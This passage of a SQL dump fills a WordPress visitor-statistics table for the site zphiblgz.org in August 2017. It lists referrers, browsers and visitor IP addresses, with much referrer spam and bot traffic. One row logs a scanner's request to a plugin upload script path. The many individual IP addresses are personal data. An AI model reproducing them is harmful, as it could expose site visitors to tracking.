x','Windows','40.1','','182.183.215.64','000',2,0),(9537,'2017-08-23','http://cool-wedding.net/','Unknown','Unknown','Unknown','','46.118.125.246','000',2,0),(9538,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.164','000',1,0),(9539,'2017-08-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.248.166.157','000',1,0),(9540,'2017-08-23','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','195.54.162.174','000',1,0),(9541,'2017-08-23','http://zphiblgz.org','Safari','Linux','538.1','','51.255.214.84','000',2,0),(9542,'2017-08-23','http://zphiblgz.org','Opera','Windows','12.02','','148.251.2.2','000',3,0),(9543,'2017-08-23','http://zphiblgz.org','Opera','Windows','12.14','','148.251.2.2','000',8,0),(9544,'2017-08-23','http://zphiblgz.org','Safari','Macintosh','5.1.7','','148.251.2.2','000',4,0),(9545,'2017-08-23','http://zphiblgz.org','Chrome','Linux','41.0.2227.0','','148.251.2.2','000',3,0),(9546,'2017-08-23','http://zphiblgz.org','Chrome','Windows','4.0.222.3','','148.251.2.2','000',3,0),(9547,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','148.251.2.2','000',3,0),(9548,'2017-08-23','https://schock-store.ru/','MSIE','Windows','6.0','','46.118.154.36','000',3,0),(9549,'2017-08-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(9550,'2017-08-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(9551,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','197.1.50.112','000',1,0),(9552,'2017-08-23','https://pl.id-forex.com/','MSIE','Windows','6.0','','46.118.118.100','000',5,0),(9553,'2017-08-23','http://zphiblgz.org','Chrome','Macintosh','41.0.2227.1','','148.251.2.2','000',1,0),(9554,'2017-08-23','http://zphiblgz.org','Chrome','Linux','45.0.2454.101','','148.251.2.2','000',3,0),(9555,'2017-08-23','http://zphiblgz.org','Chrome','Windows','41.0.2227.0','','148.251.2.2','000',1,0),(9556,'2017-08-23','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','148.251.2.2','000',2,0),(9557,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','89.229.92.206','000',1,0),(9558,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(9559,'2017-08-23','https://www.google.com/','Safari','iPhone','10.0','','107.77.83.108','000',2,0),(9560,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.87','000',4,0),(9561,'2017-08-23','http://zphiblgz.org','Firefox','Windows','40.1','','74.99.76.53','000',1,0),(9562,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',2,0),(9563,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',1,0),(9564,'2017-08-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','5.189.188.111','000',1,0),(9565,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.141.39.47','000',2,0),(9566,'2017-08-23','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.70','000',1,0),(9567,'2017-08-23','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','52.53.184.8','000',1,0),(9568,'2017-08-23','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','54.183.121.240','000',88,0),(9569,'2017-08-23','http://zphiblgz.org','Chrome','Linux','60.0.3112.101','','13.56.157.67','000',1,0),(9570,'2017-08-23','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(9571,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(9572,'2017-08-23','http://podshipniki-nsk.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(9573,'2017-08-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.16.200.176','000',1,0),(9574,'2017-08-23','http://zphiblgz.org','Chrome','Chrome OS','59.0.3071.134','','69.143.34.19','000',1,0),(9575,'2017-08-23','http://macrotek.ru/','Unknown','Unknown','Unknown','','188.163.79.53','000',2,0),(9576,'2017-08-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(9577,'2017-08-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.100.224','000',1,0),(9578,'2017-08-23','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1523.JBa7TPZ7yW1BfTyOcWdxzwBxYYDZSl0vHTh7SRjKlPorAunlZkcqo-JMtzuzRm1M.ff9a512d901069b41d7fc317d87282528d21e858&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5NbWloY284S21FeFNoZEJNYjJyWGZMaWlsM1B4YWVmNHoyQ2stdGoxZW9Q&b64e=2&sign=35a8d89ed450448236b5b8d012e6c4dc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfg4NT5X6rEPyxL6D2pLrsFmAEtjxkbhu5vyXPBrwgfAJluSnZLadSdL87Cfj57auVtrqjh-jL6AtSOcFuyVJWHmX02FES4zgqp107OUILA1gXcDBr6cKf9Q&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEt8TWxXS2hFvC7m25tYdO__g4Eqx1ioVoRra6usKAA-sgbvHMc5NlmVvjYatgyV56g&l10n=ru&cts=1503549280769&mc=2.70687195778','Firefox','Windows','53.0','','178.140.120.240','000',1,0),(9579,'2017-08-23','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','134.249.80.194','000',2,0),(9580,'2017-08-24','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(9581,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','110.55.164.213','000',2,0),(9582,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(9583,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(9584,'2017-08-24','https://i-hobot.ru/','MSIE','Unknown','7.0b','','46.118.154.36','000',2,0),(9585,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','2.90.98.127','000',2,0),(9586,'2017-08-24','http://kaliningrad.zrus.org/','MSIE','Unknown','7.0b','','46.118.125.246','000',2,0),(9587,'2017-08-24','http://www.vizitki.net/','MSIE','Unknown','7.0b','','46.118.118.100','000',4,0),(9588,'2017-08-24','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','107.181.174.180','000',1,0),(9589,'2017-08-24','http://zphiblgz.org/+http://zphiblgz.org/event/4th-annual-denim-pearlz-party/','Chrome','Windows','48.0.2564.109','','176.123.6.130','000',4,0),(9590,'2017-08-24','http://zphiblgz.org','Firefox','Windows','38.0','','176.123.6.130','000',1,0),(9591,'2017-08-24','https://moje-recenze.cz/','MSIE','Windows','6.0','','188.163.79.53','000',5,0),(9592,'2017-08-24','http://zphiblgz.org','Chrome','Chrome OS','59.0.3071.134','','69.143.34.19','000',4,0),(9593,'2017-08-24','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','96.244.203.215','000',2,0),(9594,'2017-08-24','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.236.195.185','000',1,0),(9595,'2017-08-24','https://www.google.com/','Firefox','Windows','54.0','','50.225.39.36','000',1,0),(9596,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.134.234.247','000',2,0),(9597,'2017-08-24','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.30','000',1,0),(9598,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','94.60.168.109','000',1,0),(9599,'2017-08-24','http://shymkent.xkaz.org/','MSIE','Unknown','6.0','','46.118.154.36','000',1,0),(9600,'2017-08-24','https://stillmiracle.com/','MSIE','Windows','6.0','','46.118.154.36','000',2,0),(9601,'2017-08-24','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.91.28','000',2,0),(9602,'2017-08-24','http://zphiblgz.org','Firefox','Windows','51.0','','94.46.247.5','000',1,0),(9603,'2017-08-24','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.63.166','000',1,0),(9604,'2017-08-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(9605,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(9606,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.133.64.186','000',2,0),(9607,'2017-08-24','http://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.15.79','000',11,0),(9608,'2017-08-24','http://zphiblgz.org/','Firefox','Windows','27.0','','195.22.127.67','000',2,0),(9609,'2017-08-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(9610,'2017-08-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(9611,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(9612,'2017-08-24','http://zphiblgz.org','Firefox','Windows','56.0','','37.59.35.90','000',2,0),(9613,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',2,0),(9614,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(9615,'2017-08-24','http://zphiblgz.org','MSIE','Windows','11.0','','46.39.70.50','000',1,0),(9616,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0);
INSERT INTO `lwz_statistics_visitor` VALUES (9617,'2017-08-24','http://pc-services.ru/','MSIE','Windows','6.0','','46.118.125.246','000',2,0),(9618,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','5.175.64.53','000',1,0),(9619,'2017-08-24','http://dverimegapolis.ru/','Unknown','Unknown','Unknown','','46.118.154.36','000',2,0),(9620,'2017-08-24','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',5,0),(9621,'2017-08-24','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.228','000',2,0),(9622,'2017-08-24','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',4,0),(9623,'2017-08-24','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','37.187.174.207','000',1,0),(9624,'2017-08-24','http://zphiblgz.org','Chrome','Linux','40.0.2217.49','','107.152.139.222','000',2,0),(9625,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',1,0),(9626,'2017-08-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.212.115','000',1,0),(9627,'2017-08-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(9628,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','112.208.234.152','000',1,0),(9629,'2017-08-24','http://zphiblgz.org','Firefox','Windows','40.1','','2.121.69.198','000',1,0),(9630,'2017-08-24','https://buy-meds24.com/','Opera','Windows','7.02','','178.137.4.41','000',3,0),(9631,'2017-08-24','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(9632,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',1,0),(9633,'2017-08-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.31.45.3','000',1,0),(9634,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','31.157.83.39','000',2,0),(9635,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.213.11','000',2,0),(9636,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(9637,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(9638,'2017-08-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','94.242.246.24','000',1,0),(9639,'2017-08-25','http://zphiblgz.org','Firefox','Windows','54.0','','108.34.229.218','000',1,0),(9640,'2017-08-25','http://zphiblgz.org','Firefox','Windows','3.5.7','','76.89.84.72','000',21,0),(9641,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','93.39.138.124','000',1,0),(9642,'2017-08-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.76','000',1,0),(9643,'2017-08-25','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.30','000',1,0),(9644,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',1,0),(9645,'2017-08-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','198.50.200.131','000',1,0),(9646,'2017-08-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1524.g9fBuNrqlSA2mvIXIIPtDI5du_WzebUZ4EZgpFlpr5n1RuDw-70J9f7ADGRp3Noj.2a52b8c9d4333e74edc142b1b2938d3fa3486aa8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5HVE9sVVcwd1lPa3FKZzVZaUJFOHd0QmpJTXp2cExDRV9XZWVBRGF2eDE2&b64e=2&sign=30351bf99cf0134757dc030f8745fc67&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4Y_Fpx2nXJV_IXmMFHMSfdCrZ0kpeuGPMH2wQHeRA6Qyv1pMppxk5Tz7AQ-VQz0MAqUP_2KG21GqkOycPAqQqn5YjZ5W1igElWRaBerE0_fzbKheXMcj0Sw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO25sA4o5ZlFbQxSs2eWB5eUkGT76Q52UCeYL9lS-nd9F_EQ_BjZmDjv5fu6DfHh4qg&l10n=ru&cts=1503660063650&mc=3.71600620536','Firefox','Windows','53.0','','79.111.161.65','000',1,0),(9647,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','93.176.208.247','000',1,0),(9648,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(9649,'2017-08-25','http://macrotek.ru/','Opera','Windows','7.11','','188.163.79.53','000',1,0),(9650,'2017-08-25','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(9651,'2017-08-25','http://zphiblgz.org','MSIE','Windows','6.0','','109.248.250.155','000',1,0),(9652,'2017-08-25','http://zphiblgz.org','Chrome','Android','60.0.3112.107','','92.185.42.130','000',1,0),(9653,'2017-08-25','http://www.anabolics.shop/','Opera','Windows','7.54','','46.118.125.246','000',2,0),(9654,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',2,0),(9655,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.76.130.117','000',2,0),(9656,'2017-08-25','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',1,0),(9657,'2017-08-25','http://www.z-master.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(9658,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','145.239.83.199','000',2,0),(9659,'2017-08-25','http://zphiblgz.org','Chrome','Android','51.0.2704.106','','192.35.47.5','000',1,0),(9660,'2017-08-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','137.74.113.23','000',7,0),(9661,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','46.17.121.245','000',1,0),(9662,'2017-08-25','https://www.google.com/','Chrome','Android','59.0.3071.125','','66.87.80.86','000',1,0),(9663,'2017-08-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(9664,'2017-08-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(9665,'2017-08-25','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','50.112.209.148','000',1,0),(9666,'2017-08-25','http://zphiblgz.org','Firefox','Windows','17.0','','77.222.100.141','000',7,0),(9667,'2017-08-25','https://ua.tc/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(9668,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(9669,'2017-08-25','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','69.140.119.220','000',2,0),(9670,'2017-08-25','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','54.160.100.65','000',1,0),(9671,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',2,0),(9672,'2017-08-25','https://mojpregled.com/','Opera','Windows','8.01','','188.163.79.53','000',2,0),(9673,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',3,0),(9674,'2017-08-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','85.25.103.69','000',1,0),(9675,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.108.105.71','000',2,0),(9676,'2017-08-25','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','54.90.16.226','000',1,0),(9677,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.98','000',2,0),(9678,'2017-08-25','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.118.118.100','000',5,0),(9679,'2017-08-25','http://life-instyle.com/eda.html','MSIE','Windows','6.0','','46.118.125.246','000',6,0),(9680,'2017-08-25','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','31.41.44.247','000',1,0),(9681,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','84.22.63.214','000',1,0),(9682,'2017-08-25','https://i-hobot.ru/','MSIE','Windows','6.0','','46.118.154.36','000',2,0),(9683,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','154.16.149.35','000',2,0),(9684,'2017-08-25','http://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','71.172.64.142','000',1,0),(9685,'2017-08-25','http://zphiblgz.org','Safari','iPhone','10.0','','71.172.64.142','000',1,0),(9686,'2017-08-25','http://zphiblgz.org','Safari','Macintosh','9.1.2','','73.172.103.206','000',9,0),(9687,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',2,0),(9688,'2017-08-25','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.63.99.129','000',2,0),(9689,'2017-08-25','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','51.255.86.53','000',2,0),(9690,'2017-08-25','https://venerologiya.com/','MSIE','Windows','6.0','','188.163.79.53','000',3,0),(9691,'2017-08-25','http://members.zphiblgz.org/membership-join/','Safari','iPhone','10.0','','69.143.34.19','000',2,0),(9692,'2017-08-25','http://zphiblgz.org','Firefox','Windows','40.1','','103.251.212.133','000',2,0),(9693,'2017-08-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','66.33.192.180','000',1,0),(9694,'2017-08-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','77.232.148.60','000',3,0),(9695,'2017-08-25','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.117.194.229','000',3,0),(9696,'2017-08-26','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.63.166','000',1,0),(9697,'2017-08-26','http://nextrent-crimea.ru/','MSIE','Windows','6.0','','46.118.118.100','000',1,0),(9698,'2017-08-26','http://zphiblgz.org','MSIE','Windows','6.0','','78.155.205.30','000',1,0),(9699,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','197.219.108.89','000',1,0),(9700,'2017-08-26','https://via-energy-order.com/','MSIE','Windows','6.0','','46.118.154.36','000',1,0),(9701,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','108.6.186.152','000',1,0),(9702,'2017-08-26','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',9,0),(9703,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(9704,'2017-08-26','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(9705,'2017-08-26','https://ikritikimou.gr/','MSIE','Windows','5.5','','188.163.79.53','000',1,0),(9706,'2017-08-26','http://zphiblgz.org','AppleWebKit','Windows','537.36','','144.217.240.34','000',19,0),(9707,'2017-08-26','http://zphiblgz.org','Safari','iPhone','10.0','','73.191.115.122','000',2,0),(9708,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.134.120','000',2,0),(9709,'2017-08-26','https://www.google.com/','Chrome','Macintosh','59.0.3071.115','','73.135.221.170','000',2,0),(9710,'2017-08-26','http://zphiblgz.org','Chrome','Chrome OS','59.0.3071.134','','69.143.34.19','000',11,0),(9711,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',2,0),(9712,'2017-08-26','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(9713,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','2.51.80.89','000',2,0),(9714,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','179.127.109.111','000',1,0),(9715,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',6,0),(9716,'2017-08-26','http://pk-pomosch.ru/','MSIE','Windows','6.0','','46.118.125.246','000',2,0),(9717,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',2,0),(9718,'2017-08-26','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(9719,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(9720,'2017-08-26','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.96.207','000',1,0),(9721,'2017-08-26','http://dverimegapolis.ru/','MSIE','Windows','5.5','','46.118.154.36','000',3,0),(9722,'2017-08-26','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','68.33.74.235','000',1,0),(9723,'2017-08-26','http://shymkent.xkaz.org/','Opera','Windows','9.01','','46.118.154.36','000',3,0),(9724,'2017-08-26','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','138.197.11.101','000',2,0),(9725,'2017-08-26','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.11.101','000',2,0),(9726,'2017-08-26','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.11.101','000',2,0),(9727,'2017-08-26','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.11.101','000',2,0),(9728,'2017-08-26','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.11.101','000',1,0),(9729,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0),(9730,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.4.81.178','000',2,0),(9731,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',2,0),(9732,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.18','000',2,0),(9733,'2017-08-26','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','213.239.232.149','000',1,0),(9734,'2017-08-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(9735,'2017-08-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(9736,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','78.237.216.37','000',1,0),(9737,'2017-08-26','https://xn----dtbndd4ae7eub.top/','MSIE','Windows','5.0','','46.118.118.100','000',2,0),(9738,'2017-08-26','http://zphiblgz.org','MSIE','Windows','6.0','','185.82.219.76','000',1,0),(9739,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.78','000',2,0),(9740,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','213.163.121.218','000',1,0),(9741,'2017-08-26','http://zphiblgz.org','Chrome','Windows','50.0.2661.102','','146.185.223.114','000',1,0),(9742,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.239.90.19','000',2,0),(9743,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',1,0),(9744,'2017-08-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(9745,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(9746,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(9747,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(9748,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(9749,'2017-08-26','http://stroyplus.ru/','Opera','Windows','9.00','','188.163.79.53','000',2,0),(9750,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(9751,'2017-08-26','https://lm.facebook.com/','Safari','iPhone','10.0','','73.212.83.10','000',2,0),(9752,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.165.168.42','000',2,0),(9753,'2017-08-26','android-app://com.google.android.googlequicksearchbox','Chrome','Android','60.0.3112.107','','174.205.23.161','000',8,0),(9754,'2017-08-26','https://letsart.ru/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(9755,'2017-08-26','http://zphiblgz.org','Safari','iPhone','10.0','','172.58.184.71','000',3,0),(9756,'2017-08-26','http://www.zetmaster.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(9757,'2017-08-26','http://zphiblgz.org','Firefox','Windows','40.1','','45.58.247.228','000',1,0),(9758,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.138.99','000',2,0),(9759,'2017-08-26','https://www.google.com/','Chrome','Android','60.0.3112.107','','166.137.240.127','000',1,0),(9760,'2017-08-26','http://zphiblgz.org','Firefox','Linux','50.0','','188.165.197.58','000',1,0),(9761,'2017-08-26','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.76','000',2,0),(9762,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.171.163','000',2,0),(9763,'2017-08-27','http://zphiblgz.org','Firefox','Linux','31.0','','37.187.56.66','000',2,0),(9764,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','51.235.231.189','000',2,0),(9765,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.141.220','000',4,0),(9766,'2017-08-27','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(9767,'2017-08-27','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(9768,'2017-08-27','https://minharevisao.com/','MSIE','Windows','6.0','','188.163.79.53','000',4,0),(9769,'2017-08-27','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1526.DfhVj1wQGv1cRYun09j-fGl48VK_bs2s-upnGwKZR4jrCIdI0X0LQTNvq6eBXW5N.5dce3c0653501ec0f337a12524bca1a8af578074&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSkM0UUo2Vy16am5Ec0llSWlySDJXT3JBTEZ0dm8waXBLV3ZiN0dXWlpPaU9VMmpaSjd3blE2&b64e=2&sign=f17bca217f8f50a781d03b8f01253ade&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FfjuJpICEUPcQWEUpripj2MQfSGtklYkEPpo8B0nLhu2PZ7wLUXOLBznEnBe2-63nkC-Jk8mZ6--c1cc-96ZN8u3jfpTyBvVnkZRotUT2yqowdhf6G6OPuDR2Dh0wcPKy&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIAZrSEW7PLhtZUikYEUeDphqSV1272X2prp_fbvq77VUQ5vI1ktSti-iCNbodp59Zg&l10n=ru&cts=1503828592505&mc=2.57284495575','Firefox','Windows','53.0','','37.204.156.184','000',1,0),(9770,'2017-08-27','http://zphiblgz.org','Firefox','Windows','40.1','','125.185.66.47','000',2,0),(9771,'2017-08-27','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(9772,'2017-08-27','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(9773,'2017-08-27','http://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(9774,'2017-08-27','http://zphiblgz.org','Java','Unknown','1.8.0','','122.15.156.143','000',2,0),(9775,'2017-08-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.27.211','000',14,0),(9776,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.61.149.100','000',3,0),(9777,'2017-08-27','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(9778,'2017-08-27','http://zphiblgz.